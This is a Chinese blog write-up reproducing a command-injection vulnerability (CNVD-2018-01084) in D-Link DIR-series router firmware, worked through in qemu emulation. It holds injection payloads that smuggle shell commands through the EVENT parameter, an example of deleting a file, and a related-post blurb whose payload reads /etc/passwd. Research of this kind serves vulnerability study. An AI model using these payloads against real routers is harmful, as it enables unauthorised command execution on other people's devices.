Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

最新推荐文章于 2023-06-20 15:41:25 发布
最新推荐文章于 2023-06-20 15:41:25 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44229639/article/details/121118439
版权

Dlink路由器 CNVD-2018-01084复现分析

0x01 背景介绍

D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞是由于service.cgi中拼接了HTTP POST请求中的数据,造成后台命令拼接,导致可执行任意命令

cnvd上的漏洞说明:https://www.cnvd.org.cn/flaw/show/CNVD-2018-01084

0x02 固件分析

  1. 在官网获取漏洞版本的固件:DIR645A1_FW102B08.bin

  2. 解压固件,获得文件系统

    (1)安装sasquatch 在这里插入图片描述
    ​ 需要安装sasquatch

    ​ https://github.com/devttys0/sasquatch

    (2)binwalk
    在这里插入图片描述
    在这里插入图片描述
    ​ 获得完整的文件系统
    CGI中一般通过getenv或stdlib库函数getenv来获得环境变量获取post过来的数据,

getenv

要注入的命令放到request_uri环境变量时候成功

0x03 固件仿真

​ 使用qemu user mode 对固件进行部分仿真,对象是cgibin

chroot . ./qemu-mipsel-static ./htdocs/cgibin

​ 由于chroot . 改变根目录 无法搜索环境变量 qemu-mipsel-static

​ 将其拷贝至当前目录 以./qemu-mipsel-static调用
在这里插入图片描述
​ 发现提示unknown command cgibin

​ 使用IDA分析main函数,发现:

在这里插入图片描述

​ 将第一个参数与XXX.cgi做对比,选择执行XXX_main函数

​ 那么,使用qemu -0方式 指定第一个参数

chroot . ./qemu-mipsel-static -0 "service.cgi" ./htdocs/cgibin

在这里插入图片描述
现在只要确定漏洞的调用链,并构造HTTP POST请求即可。

0x04 漏洞分析

​ 命令注入一般发生在危险函数出现的地方,例如system, execve,execlp

​ 以本漏洞的cgibin文件为例,使用IDA对system溯源分析

在这里插入图片描述

漏洞在lxmldbc_system函数
在这里插入图片描述

溯源可得
在这里插入图片描述

​ 构造 EVENT=&shell_cmd& 则对于

​ lxmldbc_system(“event %s > /dev/null”, v5)

​ 等价为:system(event & shell_cmd & > /dev/null)

​ 可注入shell_cmd

溯源至main函数,构造完整的POST请求

​ CGI中一般通过getenv来获得环境变量获取post过来的数据。在cgibin中未找到stdin,scanf这样的函数或者字符串,因此把要注入的命令当做输入参数传递不能成功,仔细检查每一个genenv,把要注入的命令放到request_uri环境变量时候成功。

在这里插入图片描述
In cgibin_parse_request
在这里插入图片描述
​ 最终脚本:

sudo chroot . ./qemu-mipsel-static  \
-0 "service.cgi" \
-E REQUEST_METHOD="POST" \
-E CONTENT_LENGTH=100 \
-E REQUEST_URI="service.cgi?EVENT=%26ls%ls" \
-E CONTENT_TYPE="application/x-www-form-urlencoded" \
-E HTTP_COOKIE="uid=ztl" \
./htdocs/cgibin

在这里插入图片描述
异常错误??
在IDA中搜索:
在这里插入图片描述
可视化调用链:
在这里插入图片描述

0x05 动态调试

sudo chroot . ./qemu-mipsel-static -strace -g 1234	 \
-0 "service.cgi" \
-E REQUEST_METHOD="POST" \
-E CONTENT_LENGTH=100 \
-E REQUEST_URI="service.cgi?EVENT=%26ls%26" \
-E CONTENT_TYPE="application/x-www-form-urlencoded" \
-E HTTP_COOKIE="uid=ztl" \
./htdocs/cgibin

发现问题在cgibin_parse_request函数

在这里插入图片描述

动态调试,修改对应寄存器的值,使得可以正常运行至system
在这里插入图片描述

跳过 sess_validate函数(仿真环境没有路由器的证书等配置)
在这里插入图片描述

​ 成功执行ls函数,并打印
在这里插入图片描述

0x06 漏洞利用

构造EVENT=&shell_cmd&

即可注入shell_cmd

​ 以删除某文件为例
在这里插入图片描述
​ 最终效果:
在这里插入图片描述

2T1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现】D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞CVE-2024-3273
失心少年
04-18 167
D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。D-Link DNS-320L存在命令注入漏洞,该漏洞源于文件/cgi-bin/nas_sharing.cgi存在命令注入漏洞。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。
CNVD-2018-01084 远程代码执行复现
SkYe's Blog
02-09 715
Dlink DIR 615/645/815 路由上远程代码执行漏洞漏洞存在于 /htdocs/cgibin 二进制文件中,原因是 service.cgi 中未经过滤就将用户输入拼接到命令中。 复现环境 漏洞固件 Firmware:DIR-645_A1_FW: v1.02b08 (for WW) (tw官网选择 DIR-645 第一个文件) qemu v5.2 Ubuntu 18.04 ida 7.5(能搞 mips 反编译工具都行) 直接运行如下: 漏洞分析 strrchr 匹配出 / 后面的参数后
路由器漏洞复现_看了之后每个人都是黑客
最新发布
m0_67742636的博客
06-20 790
渗透测试,网络安全路由器安全
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 6861
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
D-Link DIR505路由器溢出漏洞实战
牛叫兽的测试学习和分享
12-14 5079
IOT安全,溢出漏洞学习实践
路由器漏洞复现终极奥义——基于MIPS的shellcode编写
01-21 1254
前言 今天我们来聊聊如何在MIPS架构中编写shellcode。在前面的两篇文章中,我们分别介绍了基于MIPS的缓冲区溢出实践,以及进一步的如何利用学到的溢出知识复现与验证路由器漏洞。但是在上文的路由器漏洞利用的例子里面,我们需要有一个前置条件,即含有漏洞的程序必须导入了系统的库函数,我们才能方便的验证,然而这个条件并不是时刻有效的。因此,在本文中,我们介绍路由器漏洞复现的终极奥义——基于MI...
D-link路由器限速思路的分析
10-01
以下是对D-Link路由器限速思路的详细分析: 一、封端口 封端口是一种基本的限制策略,但其效果有限。由于P2P软件如BT、电驴等可以动态指定或使用广泛的端口范围,完全封禁并不实际。不过,可以针对常见的端口进行...
UniFI-Dlink-DIR-615:Dlink DIR 615 漏洞利用
06-02
UniFI-Dlink-DIR-615 搜索 Unifi Dlink DIR-615 路由器的服务器详细信息 = Mathopd/1.5p6 country:MY 国家过滤器仅适用于注册用户,因此请确保您已注册 选择任何你想要的路由器 要获取用户的凭据,请输入以下 ...
dlink-dcs-python-lib:用于控制DLINK DCS 5025L无线IP摄像机的Python库
05-11
DLINK DCS 5025L无线IP摄像机的Python库 该库已为DLINK DCS 5025L无线Pan Tile IP网络摄像头构建并经过测试。 该库可与其他DLINK IP摄像机完全或部分运行(未经测试)。 运行测试 运行库测试将更新和重置各种IP摄像...
dlink路由器无线信号经常中断的故障排除方法
10-01
在日常生活中,我们可能会遇到Dlink路由器无线信号频繁中断的问题,这给我们的网络使用带来很大不便。本篇文章将深入探讨可能导致这一现象的原因,并提供一系列的故障排除方法,以帮助用户解决这一问题。 首先,...
Dlink-dir615路由器安装说明
07-15
Dlink-dir615路由器安装说明 详细图文说明路由器的安装设置使用
cve-2018-5767 路由器栈溢出漏洞复现
蚁景网安学院
02-15 1375
‍点击蓝字关注我们一、前言 本文通过arm架构的路由器栈溢出漏洞为例介绍IOT固件分析以及arm架构下的栈溢出利用。漏洞产生的原因是未对用户的输入进行合理的限制而直接使用sscanf函数拷...
Samsung-WLAN-AP路由器RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
02-01 4260
简介: 三星-WLAN-AP-WEA453e 路由器存在远程命令执行。 fofa搜索: title="Samsung WLAN AP" 大多都是国外的,随便点击一个后进入网页主页面 漏洞利用: 利用burp构造特殊的请求 exp: POST /(download)/tmp/a.txt HTTP/1.1 Host: xxx.xxx.xxx.xxx command1=shell:cat /etc/passwd| dd of=/tmp/a.txt 利用工具
TOTOLink T6路由器漏洞复现
PMJ的博客
01-11 6607
TOTOLink T6路由器漏洞复现 来源:xman夏令营 产品描述 产品介绍:价格不用两张的无线路由器 分为子母路由器,如果是子路由器,需要找到登录ip,恢复出厂设置 漏洞描述 该设备可直接开启telnet功能;且mqtt协议处未对订阅者进行认证处理,且命令执行前未做判断和过滤,所以存在远程命令执行漏洞 开启Telnet 对固件解压分析:发现web_cste下有telnet.html,访问发现telnet服务 开启后尝试连接,需要密码 且burp抓包重发,发现没有cookie也是可以开启的 到固件
0x01 D-Link路由器漏洞研究分享
q759451733的博客
03-06 1181
0x0 简介 D-Link DIR-816 A2是中国台湾友讯(D-Link)公司的一款无线路由器。攻击者可借助 "datetime" 参数中的shell元字符利用该漏洞在系统上执行任意命令。 0x1 准备 固件版本 1.10B05:http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-816 漏洞存在的程序:goahead 0x2 工具 1.静态分析工具:IDA 2.系统文件获取:binwalk 3.动态调试工具:qemu、ID
D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)
good good study
03-09 4551
漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行漏洞影响 AU_2.31_V1.1.47ae55之前版本 EG_1.00b4 漏.
D-Link RCE漏洞分析
weixin_43137410的博客
09-08 447
Dlink DP-311U XP系统打印服务器使用说明书.doc.doc
07-05
本文档详细介绍了Dlink DP-311U打印服务器在Windows XP系统下的设置和使用方法。首先,用户需要确保打印服务器已正确连接电源和网络,通过设置本机的有线网络连接,包括配置IP地址,通常为192.168.0.10。然后,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值